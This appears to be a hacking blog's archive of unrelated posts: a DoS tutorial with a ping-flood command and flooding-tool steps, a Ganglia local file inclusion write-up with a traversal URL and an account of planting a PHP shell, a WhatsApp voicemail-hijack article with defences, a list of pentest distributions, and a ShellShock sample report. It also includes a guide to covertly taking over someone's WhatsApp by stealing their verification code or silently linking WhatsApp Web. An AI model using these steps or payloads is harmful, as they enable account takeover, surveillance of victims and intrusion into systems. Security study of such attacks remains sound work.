Friday, May 22, 2020

DoS (Denial of Service) Attack Tutorial: Ping of Death, DDoS

What is DoS Attack?

DoS is an attack used to deny legitimate users access to a resource such as a website, network, or email, or to make it extremely slow. DoS is the acronym for Denial of Service. This type of attack is usually implemented by hitting the target resource, such as a web server, with too many requests at the same time. This results in the server failing to respond to all the requests. The effect can be either crashing the servers or slowing them down.


Cutting off a business from the internet can lead to significant loss of business or money. The internet and computer networks power a lot of businesses. Some organizations, such as payment gateways and e-commerce sites, depend entirely on the internet to do business.

In this tutorial, we will introduce you to what a denial of service attack is, how it is performed and how you can protect against such attacks.


Types of DoS Attacks

There are two types of DoS attacks, namely:

  • DoS – this type of attack is performed by a single host
  • Distributed DoS – this type of attack is performed by a number of compromised machines that all target the same victim. It floods the network with data packets.

Ultimate guide to DoS(Denial of Service) Attacks

How DoS attacks work

Let's look at how DoS attacks are performed and the techniques used. We will look at five common types of attacks.

Ping of Death

The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The ping of death takes advantage of this and sends data packets above the maximum limit (65,536 bytes) that TCP/IP allows. TCP/IP fragmentation breaks the packets into small chunks that are sent to the server. Since the sent data packages are larger than what the server can handle, the server can freeze, reboot, or crash.

Smurf

This type of attack uses large amounts of Internet Control Message Protocol (ICMP) ping traffic targeted at an Internet Broadcast Address. The reply IP address is spoofed to that of the intended victim. All the replies are sent to the victim instead of the IP used for the pings. Since a single Internet Broadcast Address can support a maximum of 255 hosts, a smurf attack amplifies a single ping 255 times. The effect of this is slowing down the network to a point where it is impossible to use it.

Buffer overflow

A buffer is a temporary storage location in RAM that is used to hold data so that the CPU can manipulate it before writing it back to the disk. Buffers have a size limit. This type of attack loads the buffer with more data than it can hold. This causes the buffer to overflow and corrupt the data it holds. An example of a buffer overflow is sending emails with file names that have 256 characters.

Teardrop

This type of attack uses larger data packets. TCP/IP breaks them into fragments that are assembled on the receiving host. The attacker manipulates the packets as they are sent so that they overlap each other. This can cause the intended victim to crash as it tries to re-assemble the packets.
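Seen from the receiving side, Ping of Death and Teardrop both come down to fragment sets that a reassembler should refuse to rebuild. The following is an added example, not part of the original tutorial: the `Fragment` fields, the `check_fragments` and `split` helpers and the sample fragment sets are assumptions constructed for illustration.

```python
"""Fragment sanity checks to apply before rebuilding an IPv4 datagram.
Added example; names and sample data are constructed for illustration."""
from dataclasses import dataclass
from typing import List

MAX_IP_DATAGRAM = 65535  # 16-bit Total Length field: header + payload


@dataclass(frozen=True)
class Fragment:
    offset_units: int      # Fragment Offset field, counted in 8-byte units
    payload_len: int       # payload bytes carried by this fragment
    more_fragments: bool   # MF flag; False only on the last fragment
    header_len: int = 20   # IPv4 header length in bytes (no options)

    @property
    def start(self) -> int:
        return self.offset_units * 8

    @property
    def end(self) -> int:
        return self.start + self.payload_len


def check_fragments(fragments: List[Fragment]) -> List[str]:
    """Return the reasons to drop this fragment set (empty list = accept).

    All fragments are assumed to share one (src, dst, protocol, ID) key.
    """
    reasons = []
    ordered = sorted(fragments, key=lambda f: (f.start, f.end))

    # Ping of Death: the rebuilt datagram would be longer than the Total
    # Length field can describe, overflowing a fixed-size reassembly buffer.
    if any(f.header_len + f.end > MAX_IP_DATAGRAM for f in ordered):
        reasons.append("oversize")

    # Teardrop: a fragment starts before the data already covered ends.
    covered = 0
    for f in ordered:
        if f.start < covered:
            reasons.append("overlap")
            break
        covered = max(covered, f.end)

    # Every fragment except the last must carry a multiple of 8 bytes,
    # otherwise the next offset cannot line up with where this one ends.
    if any(f.more_fragments and f.payload_len % 8 for f in ordered):
        reasons.append("misaligned")

    return reasons


def split(total_payload: int, per_fragment: int = 1480) -> List[Fragment]:
    """Constructed input: fragment a payload as a 1500-byte MTU link would."""
    frags, start = [], 0
    while start < total_payload:
        size = min(per_fragment, total_payload - start)
        frags.append(Fragment(start // 8, size, start + size < total_payload))
        start += size
    return frags


# Constructed samples.
# Legal: 65500-byte echo payload + 8-byte ICMP header + 20-byte IP header
# is 65528 bytes, still within the 65535-byte limit.
LEGAL = split(65508)
# Oversize: the final fragment ends past what Total Length can express.
OVERSIZE = split(65518)
# Overlap: the second fragment lies inside the range the first one covered.
TEARDROP = [Fragment(0, 40, True), Fragment(3, 8, False)]

if __name__ == "__main__":
    for name, frags in (("legal", LEGAL), ("oversize", OVERSIZE),
                        ("teardrop", TEARDROP)):
        print(name, check_fragments(frags) or "accept")
```
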

SYN attack

SYN is a short form for Synchronize. This type of attack takes advantage of the three-way handshake to establish communication using TCP. SYN attack works by flooding the victim with incomplete SYN messages. This causes the victim machine to allocate memory resources that are never used and deny access to legitimate users.

DoS attack tools

The following are some of the tools that can be used to perform DoS attacks.

  • Nemesy – this tool can be used to generate random packets. It works on Windows. This tool can be downloaded from http://packetstormsecurity.com/files/25599/nemesy13.zip.html . Due to the nature of the program, if you have an antivirus, it will most likely be detected as a virus.
  • Land and LaTierra – this tool can be used for IP spoofing and opening TCP connections.
  • Blast – this tool can be downloaded from http://www.opencomm.co.uk/products/blast/features.php
  • Panther – this tool can be used to flood a victim's network with UDP packets.
  • Botnets – these are multitudes of compromised computers on the Internet that can be used to perform a distributed denial of service attack.

DoS Protection: Prevent an attack

An organization can adopt the following policy to protect itself against Denial of Service attacks.

  • Attacks such as SYN flooding take advantage of bugs in the operating system. Installing security patches can help reduce the chances of such attacks.
  • Intrusion detection systems can also be used to identify and even stop illegal activities.
  • Firewalls can be used to stop simple DoS attacks by blocking all traffic coming from an attacker by identifying his IP.
  • Routers can be configured via the Access Control List to limit access to the network and drop suspected illegal traffic.

Hacking Activity: Ping of Death

We will assume you are using Windows for this exercise. We will also assume that you have at least two computers that are on the same network. DoS attacks are illegal on networks that you are not authorized to test. This is why you will need to set up your own network for this exercise.

Open the command prompt on the target computer

Enter the command ipconfig. You will get results similar to the ones shown below


For this example, we are using Mobile Broadband connection details. Take note of the IP address. Note: for this example to be more effective, you must use a LAN.

Switch to the computer that you want to use for the attack and open the command prompt

We will ping our victim computer continuously with data packets of size 65500

Enter the following command

ping 10.128.131.108 -t -l 65500

HERE,

  • "ping" sends the data packets to the victim
  • "10.128.131.108" is the IP address of the victim
  • "-t" means the data packets should be sent until the program is stopped
  • "-l" specifies the data load to be sent to the victim

You will get results similar to the ones shown below


Flooding the target computer with data packets doesn't have much effect on the victim. In order for the attack to be more effective, you should attack the target computer with pings from more than one computer.

The above attack can be used to attack routers, web servers etc.

If you want to see the effects of the attack on the target computer, you can open the task manager and view the network activities.

  • Right click on the taskbar
  • Select start task manager
  • Click on the network tab
  • You will get results similar to the following


If the attack is successful, you should be able to see increased network activities.

 

Hacking Activity: Launch a DOS attack

In this practical scenario, we are going to use Nemesy to generate data packets and flood the target computer, router or server.

As stated above, Nemesy will be detected as an illegal program by your anti-virus. You will have to disable the anti-virus for this exercise.


Enter the target IP address, in this example; we have used the target IP we used in the above example.

HERE,

  • 0 as the number of packets means infinity. You can set it to the desired number if you do not want to send an infinite number of data packets.
  • The size field specifies the data bytes to be sent and the delay specifies the time interval in milliseconds.

 

Click on send button

You should be able to see the following results


The title bar will show you the number of packets sent

Click on halt button to stop the program from sending data packets.

You can monitor the task manager of the target computer to see the network activities.

Summary

  • A denial of service attack's intent is to deny legitimate users access to a resource such as a network, server etc.
  • There are two types of attacks, denial of service and distributed denial of service.
  • A denial of service attack can be carried out using SYN Flooding, Ping of Death, Teardrop, Smurf or buffer overflow
  • Security patches for operating systems, router configuration, firewalls and intrusion detection systems can be used to protect against denial of service attacks.
@EVERYTHING NT



Ganglia Monitoring System LFI


A while back when doing a pentest I ran into an interesting web application on a server that was acting as a gateway into a juicy environment *cough*pci*cough*, the application was "Ganglia Monitoring System" http://ganglia.sourceforge.net
The scope of the test was extremely limited and it wasn't looking good....the host that was in scope had a ton of little stuff but nothing that looked like it would give me a solid foothold into the target network. After spending some time looking for obvious ways into the system I figured it would be worth looking at the Ganglia application, especially since I could find no public exploits for the app in the usual places....

First step was to build a lab up on a VM (ubuntu)
apt-get install ganglia-webfrontend

After apt was done doing its thing I went ahead and started poking around in the web front end files (/usr/share/ganglia-webfrontend). I looked to see if the application had any sort of admin functionality that I could abuse or some sort of insecure direct object reference issues. Nothing looked good. I moved on to auditing the php.

Started out with a simple grep looking for php includes that used a variable....bingo.

steponequit@steponequit-desktop:/usr/share/ganglia-webfrontend$ egrep 'include.*\$' *
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $tpl_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $include_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: $include_file = $regs[2];
class.TemplatePower.inc.php: if( !@include_once( $include_file ) )
class.TemplatePower.inc.php: $this->__errorAlert( 'TemplatePower Error: Couldn\'t include script [ '. $include_file .' ]!' );
class.TemplatePower.inc.php: $this->tpl_include["$iblockname"] = Array( $value, $type );
graph.php: include_once($graph_file);
The graph.php line jumped out at me. Looking into the file it was obvious this variable was built from user input :)
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : NULL;
....
....
....
$graph_file = "$graphdir/$graph.php";


Taking a look at the "sanitize" function I can see this shouldn't upset any file include fun

function sanitize ( $string ) {
    return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}

#-------------------------------------------------------------------------------
# If arg is a valid number, return it. Otherwise, return null.
function clean_number( $value )
{
    return is_numeric( $value ) ? $value : null;
}
Going back to the graph.php file

$graph_file = "$graphdir/$graph.php";

if ( is_readable($graph_file) ) {
    include_once($graph_file);

    $graph_function = "graph_${graph}";
    $graph_function($rrdtool_graph); // Pass by reference call, $rrdtool_graph modified inplace
} else {
    /* Bad stuff happened. */
    error_log("Tried to load graph file [$graph_file], but failed. Invalid graph, aborting.");
    exit();
}

We can see here that our $graph value is inserted into the target string $graph_file with a directory on the front and a php extension on the end. The script then checks to make sure it can read the file that has been specified and finally includes it, looks good to me :).
The start of our string is defined in conf.php as "$graphdir='./graph.d'", this poses no issue as we can traverse back to the root of the file system using "../../../../../../../../". The part that does pose some annoyance is that our target file must end with ".php". So on my lab box I put a php file (phpinfo) in "/tmp" and tried including it...


Win. Not ideal, but it could work....

Going back to the real environment with this it was possible to leverage this seemingly limited vulnerability by putting a file (php shell) on the nfs server that was being used by the target server, this information was gathered from a seemingly low vuln - "public" snmp string. Once the file was placed on nfs it was only a matter of making the include call. All in a hard day's work.

I have also briefly looked at the latest version of the Ganglia web front end code and it appears that this vuln still exists (graph.php)

$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
...
...
...
$php_report_file = $conf['graphdir'] . "/" . $graph . ".php";
$json_report_file = $conf['graphdir'] . "/" . $graph . ".json";
if( is_file( $php_report_file ) ) {
include_once $php_report_file;


tl;dr; wrap up - "Ganglia Monitoring System" http://ganglia.sourceforge.net contains a LFI vulnerability in the "graph.php" file. Any local php files can be included by passing its location to the "g" parameter - http://example.com/ganglia/graph.php?g=../../../../../../../tmp/shell
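The include path above is built from "g" after a filter that only escapes shell metacharacters, so "." and "/" pass through and the path can leave graph.d. As an added example (not code from the post or from Ganglia), this Python model of the same path construction puts it beside a contained version that allowlists the report name and checks the resolved path; in PHP the equivalent containment test would use realpath(). The function names, the name pattern and the temporary directory tree are assumptions constructed for the demonstration.

```python
"""Model of graph.php's include path and a contained replacement.
Added example; function names and the temporary tree are assumptions."""
import os
import re
import tempfile
from typing import Optional

GRAPH_NAME = re.compile(r"[A-Za-z0-9_]+")  # report names only, no separators


def naive_graph_path(graphdir: str, g: str) -> str:
    # Same construction as "$graphdir/$graph.php": g is trusted as-is.
    return f"{graphdir}/{g}.php"


def safe_graph_path(graphdir: str, g: str) -> Optional[str]:
    """Return the file that may be included, or None if g is rejected."""
    if not GRAPH_NAME.fullmatch(g):
        return None  # rejects "/", "..", NUL bytes and anything unexpected
    base = os.path.realpath(graphdir)
    candidate = os.path.realpath(os.path.join(base, g + ".php"))
    # realpath follows symlinks, so a link inside graph.d that points
    # somewhere else fails the containment test below.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo() -> dict:
    """Build a constructed directory tree and compare both functions."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.realpath(tmp)
        graphdir = os.path.join(root, "web", "graph.d")
        outside = os.path.join(root, "tmp", "outside.php")
        os.makedirs(graphdir)
        os.makedirs(os.path.dirname(outside))
        for path in (os.path.join(graphdir, "cpu_report.php"), outside):
            with open(path, "w") as fh:
                fh.write("<?php /* constructed sample */ ?>\n")
        os.symlink(outside, os.path.join(graphdir, "link.php"))

        traversal = "../../tmp/outside"  # same shape as the g= value above
        naive = os.path.realpath(naive_graph_path(graphdir, traversal))
        valid = safe_graph_path(graphdir, "cpu_report")
        return {
            # The unchecked path resolves to a readable file outside graph.d.
            "naive_escapes_graphdir": naive == outside and os.path.isfile(naive),
            "safe_traversal": safe_graph_path(graphdir, traversal),
            "safe_symlink": safe_graph_path(graphdir, "link"),
            "safe_valid": valid == os.path.join(graphdir, "cpu_report.php"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```
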

Wednesday, May 20, 2020

How Your WhatsApp Account Can Be Hacked Using Voicemail

Something you know, something you have and something you are. These are the three categories that systems rely on to authenticate a user, that is, the process by which the identity trying to gain access can answer the question of who it is. In their early days, most Internet services only required at sign-up that an e-mail address be associated with the account in order to change the password.

Figure 1: How your WhatsApp account can be hacked using voicemail

For an attacker who wanted to gain access to a person's service, the first step was to find out the target's e-mail address and then focus on gaining access to that e-mail account, by stealing the password with a Spear Phishing attack, by obtaining an OAuth token that allows reading all the messages as explained in Sappo, or by taking advantage of a password-recovery e-mail account that has been forgotten and has expired. But the first step is always the same: finding out the e-mail address that a target uses to identify themselves to Internet services, when originally it was only meant for receiving messages.

E-mail as an essential element of authentication

In many cases, a simple Google search using search-engine hacking techniques could turn up a person's e-mail address. However, that person may never have published it, in which case we can turn to the following techniques:

- Login leak: Chema Alonso already discussed this in the article "Intimate-contact social networks that leak their customers' accounts", where, when you enter an e-mail address, the service itself tells you whether or not an account has been created with that address. In services such as Gmail, besides validating that the e-mail address exists, you can even learn the brand of the person's mobile phone, since the user is required to go to the "Security" tab to obtain the security code in order to authenticate.

Figure 2: Article "Is your president safe on Twitter?"
by Yaiza Rubio and Felix Brezo, published on the ElevenPaths blog

In Outlook, by contrast, if the e-mail address exists it asks you directly for the password. Or, for example, in 2017, my colleague Félix Brezo and I identified the Twitter accounts of all the heads of government and found that at least 85% of them exposed a hint of the account used on this social network, and that 30% had used a Gmail account to register.

- Combinations of username and e-mail service: when we find ourselves not knowing which account is used, OSRFramework provides a tool called mailfy which, given a username or an e-mail address as input, checks whether there is an account registered on services such as Facebook, Gmail and others.

Figure 3: Manual de Ciberinvestigación en Fuentes Abiertas: OSINT para Analistas

This is a tool we use a lot in our examples of searching OSINT sources for information in the world of cyber investigation.

Once we have found out the e-mail address, in the end it all comes down to being able to recover lost access. This is a system widely accepted by most services as the account recovery method for when you have forgotten your password, but one that has caused more than one celebrity some trouble.

The phone number as an essential element of authentication

Seeing that e-mail addresses and passwords were not the most advisable option, authentication based on the phone number was born. To this end, services such as Mobile Connect, among others, have been created, in which passwords are eliminated completely. The end user enters their phone number and the operator automatically sends a challenge to verify possession of the phone number and thus complete the authentication. However, there are other Internet services, such as WhatsApp and Telegram, that base account creation on the phone number.

Let's start with WhatsApp

Imagine a situation in which an attacker wants to take over a WhatsApp user's account. After installing the app, they will have to enter the phone number of the account they want to recover on that handset and then select one of the two methods the platform offers for delivering the verification code to the user.

We are going to set out three scenarios that can occur. In Scenario 1, the legitimate user has their phone and receives an SMS because the attacker has requested the code to verify the number.

Figure 4: WhatsApp registration verification by SMS

Although this scenario is less likely to succeed, there have been cases in the past in which the victim was asked for the verification code in WhatsApp's name. Note that the SMS message says it quite clearly: "Don't share this code with anyone!" But there are more methods.

1.- Social engineering: As we said, asking the victim by means of an e-mail, another SMS, a malicious WhatsApp account or by phoning them directly. When it comes to deceiving a user, any route is valid.

2.- Malicious or vulnerable app with permission to access SMS: If the attacker controls a malicious app with permission to read SMS messages on the handset, they could always retrieve the code. That is why you have to be very careful about which apps you install (so that you do not end up with a trojan or a Gremlin App) and keep the operating system and apps up to date. If your handset does not support the latest versions of the Android operating system, you should think about replacing it.

3.- Duplicated SIM: If someone can duplicate your identity documents with a photocopy, or manages to convince an employee at one of your operator's shops to issue a duplicate of your SIM, they could receive the SMS messages at the same time, which is why you have to be very careful with your personal information and identity documents.

4.- SIM Swapping: In some countries, the attacks are carried out by abusing number portability policies, so it is important to know how well protected your number is against a porting attempt.

5.- RTL attacks: These abuse the security of the SMS channel. If the attacker is nearby and knows the tools and attacks of mobile communications hacking well, they could capture the SMS when the nearest antenna forwards it to your handset.

6.- SMS preview: If you have SMS message previews enabled on your handset's lock screen, someone could read them in a careless moment. It would be a local attack, but just as dangerous. The same goes for the Siri trick for stealing e-mail accounts.

As you can see, WhatsApp's owner verification by SMS has its "corner cases", and certain precautions must be taken to prevent one of these cases from affecting us. Even so, there remain two more possibilities that can easily be exploited by a nearby or remote attacker.

Scenario 2: Phone call

In Scenario 2, the verification code is sent by SMS and, if it has not been entered after one minute, the victim may receive a call to their phone number in which they are told their verification code.

Figure 5: Verification by a call to the phone number

In these settings, if the attacker had the victim's phone, they could simply answer the call, listen to the verification code and take over the account, since the handset does not have to be unlocked to answer a phone call.

Voicemail

But suppose the victim does not answer the call. Then Scenario 3 occurs. WhatsApp automatically leaves you a message in your voicemail. And then it can be stolen from your voicemail. There are usually two ways to access voicemail:

1.- From your phone: By calling from the phone number whose voicemail you are going to access, so you do not need to give the password.

Figure 6: WhatsApp leaves the verification code in the voicemail

2.- From another phone: By calling a phone number, if the call is not being made from the voicemail's own phone number. In this case you will be asked for the PIN, for which you have three attempts. If those three attempts are wrong, the call is hung up. In this situation, the attacker could turn to statistics on how frequently PINs are used, in which 1234 is the most frequent, followed by 1111 and 0000.

Telegram: SMS, the call and voicemail

WhatsApp's popular competitor, Telegram, has a similar system. It offers users the same two methods: sending the verification code by SMS and, after two minutes, calling the phone number whose account is to be recovered to tell them the verification code, with the difference that it does not leave the code in voicemail. This means the voicemail attack problem that WhatsApp has does not affect it.

Figure 7: Telegram also has a code and
a phone call as validation methods.

While it is true that any Internet service must create processes that are simple, in order to attract more users, and understandable to the user in terms of security, this last option that WhatsApp offers, leaving the verification code in voicemail, is neither simple, since probably nobody knows their PIN for accessing voicemail, nor secure, since an attacker with a little skill could, without physical access to the phone, get to the information before the user notices.

Security recommendations

As a final point, I recommend the article on how to spy on WhatsApp; although it is quite old now, many of the attacks still work in a similar way. As for keeping your WhatsApp account protected, here is the series on bulletproofing your WhatsApp account.

And for the specific case of voicemail, make sure nobody can access it remotely, either because you have voicemail disabled or because you have changed the default PIN. Make sure of that. On the other hand, perhaps WhatsApp should reconsider leaving the PIN in a voicemail, since it opens an attack vector that the user may not be aware of.

Regards,


Contact Yaiza Rubio


Top 15 Best Operating System Professional Hackers Use


A hacker is someone who seeks and exploits the weaknesses of a computer system or network computing. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment or to assess these weaknesses to help in removing them.
The listed operating systems are based on the Linux kernel, so they are all free operating systems.

1. Kali Linux

Kali Linux, maintained and funded by Offensive Security Ltd., is first on our list. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through rewriting BackTrack, its previous forensics Linux distribution based on Ubuntu. Kali Linux has a dedicated project for compatibility with and porting to specific Android devices, called Kali Linux NetHunter. It is the first open source Android penetration testing platform for Nexus devices, created as a joint effort between the Kali community member "BinkyBear" and Offensive Security. It supports wireless 802.11 frame injection, one-click MANA Evil Access Point setups, HID keyboard (Teensy-like) attacks, as well as BadUSB MITM attacks.

2. Back Box

Back Box is an Ubuntu-based Linux distribution for penetration testing and security assessment, aimed at providing a toolkit for analyzing networks and computer systems. The Back Box desktop environment includes a complete set of tools needed for ethical hacking and security testing.

3. Parrot Security OS

Parrot Security OS is a GNU/Linux distribution based on Debian. It was built in order to perform penetration tests (information security), vulnerability assessment and mitigation, computer forensics and anonymous surfing. It has been developed by the Frozenbox team.
Parrot is based on the stable branch (Jessie) of Debian, with a custom hardened Linux 4.1 kernel and a grsecurity-patched branch available. The desktop environment is MATE, a fork of Gnome 2, and the default display manager is LightDM. The project is certified to run on machines with a minimum of 265MB of RAM, and it is suitable for both 32-bit (i386) and 64-bit (amd64), with a special edition that works on older 32-bit machines (486). Moreover, the project is available for the armel and armhf architectures. It even offers an edition (both 32-bit and 64-bit) developed for servers, intended only for cloud pen testing.

4. Live Hacking OS

Live Hacking OS is a Linux distribution packed with tools and utilities for ethical hacking, penetration testing, and countermeasure verification. It includes the GNOME graphical user interface built in. There is a second variation available which has only the command line and has much lower hardware requirements.

5. DEFT Linux

DEFT stands for Digital Evidence and Forensic Toolkit. It is an open source Linux distribution built around the DART (Digital Advanced Response Toolkit) software and based on the Ubuntu operating system. It has been designed from scratch to offer some of the best open source computer forensics and incident response tools, which can be used by individuals, IT auditors, investigators, military, and police.

6. Samurai Web Testing Framework

The Samurai Web Testing Framework is a live Linux environment which has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we based the tool selection on the tools that we use in our security practice. Hence, it includes the tools used in all four steps of a web pen-test.

7. Network Security Toolkit

The Network Security Toolkit (NST) is a Linux-based Live CD that provides a set of open source computer security and networking tools to carry out routine security tasks and network diagnostics and tracing. The distribution can be used as a network security analysis, validation and monitoring tool for servers hosting virtual machines. NST has package management capabilities similar to Fedora and maintains its own repository of additional packages.

8. Bugtraq

Bugtraq is a mailing list dedicated to computer security issues. On-topic issues are new discussions about vulnerabilities, vendor security-related announcements, methods of exploitation, and how to fix them. It is a high-volume mailing list, and almost all new vulnerabilities are discussed there. Bugtraq, built by computer freaks and experienced developers, is available on Debian, Ubuntu and openSUSE for 32- and 64-bit architectures.

9. NodeZero

NodeZero is an open source Linux kernel-based operating system derived from the most popular Linux distribution in the world, Ubuntu, and designed to be used for penetration testing operations. The distribution can be downloaded as a live DVD ISO image, which runs on computers that support both the 32-bit (x86) and 64-bit (x86_64) instruction sets. Besides allowing you to start the live system, the boot menu contains several advanced features such as the ability to perform a diagnostic test of system memory, boot from a local disk, start the installer directly, and start in safe graphics mode, text mode or debug mode.
The default graphical desktop environment of NodeZero is powered by GNOME, which uses the classic GNOME interface. It has a two-panel design and uses the default software repositories of Ubuntu.

10. Pentoo

Pentoo is a Live CD and Live USB OS designed for penetration testing and security assessment. It is based on Gentoo Linux and is offered both as a 32-bit and a 64-bit installable live CD. Pentoo is also available as an overlay for an existing Gentoo installation. It has packet injection patched wifi drivers, GPGPU cracking software, and plenty of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PaX hardening and additional patches, with binaries compiled from a hardened toolchain and the latest nightly versions of some tools available.

#11 Live Hacking OS

Well, this Linux distro actually comes with some useful hacking tools which are often used in penetration testing or ethical hacking purpose. Live Hacking OS consists of the GNOME inbuilt. The operating system is really easy to operate and it can work on less RAM.

#12 Knoppix STD

This is another best Linux distro which focuses on tools for computer security. Knoppix STD brings some advanced tools for Password cracking, Firewalls, Network Utilities, Honeypots, Wireless Networking and more. This is one of the most used operating systems for Hackers.

#13 Cyborg Hawk

Cyborg Hawk is a new operating system which is based on Ubuntu Linux. Well, lots of hackers talk about Cyborg hawk and its one of the most powerful and cutting-edge penetration testing distribution that has ever been created. The operating system houses more than 700 tools for different purposes.

#14 Blackbuntu

Well, this is another operating system which is based on Linux and it was specially developed for penetration testing. Well, the operating system is very famous amongst hackers and it offers an awesome platform to learn Information security.

#15 Weakerth4n

Well, this is another of the best operating systems used by professional hackers. WeakerTh4n comes with lots of hacking tools and it's a modern operating system for WiFi hacking. Some of the wireless tools include SQL hacking, password cracking, WiFi attacks, Cisco exploitation and more.


How To Hack Any Whatsapp Account In 2020

The article is broken down into different subtopics and subcategories. This is to make it easy for those who only want to skim the article to pick the part of the WhatsApp hack they are most interested in, in case you don't have enough time to go through the entire article.

Search queries like these are commonplace: Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular messenger in the world? This article gives you all the solutions you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger now uses end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old and deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use software that can hack WhatsApp remotely. All manufacturers offer a separate web portal for reading the WhatsApp messages. In addition to WhatsApp messages, the software can also spy on other messengers, so you can also have access to social media accounts.

The software may only be installed on a smartphone if the user of the smartphone has been informed about the installation and its effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack WhatsApp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, all the other phone needs to clone WhatsApp messages is an internet connection.

The trick to hacking WhatsApp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, this is where the vulnerability lies. But you can also protect yourself from the WhatsApp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read WhatsApp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read WhatsApp messages. Even with a PIN or fingerprint lock, the WhatsApp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack a WhatsApp account, the app from the App Store must be installed on the second cell phone. After WhatsApp is installed, the target's phone number is entered. The confirmation request must then wait until there is access to the victim's smartphone.

STEP 2: WhatsApp Account Confirmation

The confirmation of the WhatsApp account is the actual security risk of the messenger. WhatsApp usually confirms the registration via SMS. Occasionally the confirmation is also delivered by an automated phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim notices the WhatsApp hack as soon as WhatsApp is opened. If the victim goes through the sign-in process again, the attacker loses access to the messages and no WhatsApp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack WhatsApp online. Here you can read WhatsApp messages via a browser and also write them. The target user can continue to use their cell phone (this works for iOS, Android phones, etc.) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to read WhatsApp messages without installing software, access to the unlocked smartphone is required for a short time. In addition to the cell phone, a computer or laptop is necessary, on which the WhatsApp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, WhatsApp must be started there. The WhatsApp settings include WhatsApp Web. If this is selected, WhatsApp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

Once the QR code shown in the browser is scanned with the smartphone, there is a permanent connection and WhatsApp messages can be read. If you hack WhatsApp in this way, you have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this WhatsApp hack only when the WhatsApp Web settings are opened in the app. WhatsApp messages can be read via the browser, regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps on Android or iOS to send and receive messages. But WhatsApp remains everyone's favorite globally!

WhatsApp is one of the most popular apps in the world. There are more than 2 billion active users on WhatsApp, messaging daily with the app. Why do people love WhatsApp? WhatsApp is very convenient and easy to use.

Other messaging apps, like Facebook Messenger, still need a special account to sign up. If you change to a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.

HACKER NT


Tuesday, May 19, 2020

ShellShock Payload Sample Linux.Bashlet



Someone kindly shared their sample of the ShellShock malware described by the MalwareMustDie group - you can read their analysis here:

File: fu4k_2485040231A35B7A465361FAF92A512D
Size: 152
MD5: 2485040231A35B7A465361FAF92A512


VirusTotal

SHA256: e74b2ed6b8b005d6c2eea4c761a2565cde9aab81d5005ed86f45ebf5089add81
File name: trzA114.tmp
Detection ratio: 22 / 55
Analysis date: 2014-10-02 05:12:29 UTC ( 6 hours, 50 minutes ago )
Antivirus             Result                        Update
Ad-Aware              Linux.Backdoor.H              20141002
Avast                 ELF:Shellshock-A [Expl]       20141002
Avira                 Linux/Small.152.A             20141002
BitDefender           Linux.Backdoor.H              20141002
DrWeb                 Linux.BackDoor.Shellshock.2   20141002
ESET-NOD32            Linux/Agent.AB                20141002
Emsisoft              Linux.Backdoor.H (B)          20141002
F-Secure              Linux.Backdoor.H              20141001
Fortinet              Linux/Small.CU!tr             20141002
GData                 Linux.Backdoor.H              20141002
Ikarus                Backdoor.Linux.Small          20141002
K7AntiVirus           Trojan ( 0001140e1 )          20141001
K7GW                  Trojan ( 0001140e1 )          20141001
Kaspersky             Backdoor.Linux.Small.cu       20141001
MicroWorld-eScan      Linux.Backdoor.H              20141002
Qihoo-360             Trojan.Generic                20141002
Sophos                Linux/Bdoor-BGG               20141002
Symantec              Linux.Bashlet                 20141002
Tencent               Win32.Trojan.Gen.Vdat         20141002
TrendMicro            ELF_BASHLET.A                 20141002
TrendMicro-HouseCall  ELF_BASHLET.A                 20141002
nProtect              Linux.Backdoor.H              20141001
